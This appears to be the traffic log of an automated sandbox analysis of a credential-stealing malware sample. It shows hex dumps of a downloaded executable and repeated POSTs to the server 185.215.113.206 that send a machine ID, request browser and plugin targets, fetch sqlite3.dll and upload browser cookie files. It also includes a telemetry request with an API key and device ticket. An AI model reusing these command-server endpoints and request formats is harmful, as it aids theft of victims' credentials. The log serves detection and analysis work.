00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 61 74 65 75 6c 73 00 40 2a 00 00 a0 00 00 00 34 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 75 74 6c 77 65 72 6d 00 20 00 00 00 e0 2a 00 00 04 00 00 00 6e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 72 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 13:10:49 GMTContent-Type: application/octet-streamContent-Length: 2790400Last-Modified: Fri, 15 Nov 2024 12:57:58 GMTConnection: keep-aliveETag: "67374556-2a9400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 61 74 65 75 6c 73 00 40 2a 00 00 a0 00 00 00 34 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 75 74 6c 77 65 72 6d 00 20 00 00 00 e0 2a 00 00 04 00 00 00 6e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 72 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 13:10:57 GMTContent-Type: application/octet-streamContent-Length: 2790400Last-Modified: Fri, 15 Nov 2024 12:57:58 GMTConnection: keep-aliveETag: "67374556-2a9400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 61 74 65 75 6c 73 00 40 2a 00 00 a0 00 00 00 34 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 75 74 6c 77 65 72 6d 00 20 00 00 00 e0 2a 00 00 04 00 00 00 6e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 72 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 15 Nov 2024 13:11:36 GMTContent-Type: application/octet-streamContent-Length: 2790400Last-Modified: Fri, 15 Nov 2024 12:57:58 GMTConnection: keep-aliveETag: "67374556-2a9400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 61 74 65 75 6c 73 00 40 2a 00 00 a0 00 00 00 34 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 75 74 6c 77 65 72 6d 00 20 00 00 00 e0 2a 00 00 04 00 00 00 6e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 72 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: /APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1731676435003Host: self.events.data.microsoft.comContent-Length: 7975Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 43 46 32 31 31 36 46 38 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="hwid"BCCF2116F8A11720009369------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="build"mars------BFHJECAAAFHIJKFIJEGC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="message"browsers------BKJJJDHDGDAAKECAKJDA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="message"plugins------DAFBGHCAKKFCAKEBKJKK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="message"fplugins------IIEHCFIDHIDGIDHJEHID--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 185.215.113.206Content-Length: 6307Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KJDGDBFBGIDGIEBGHCGI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="file"------CGCFIIEBKEGHJJJJJJDA--
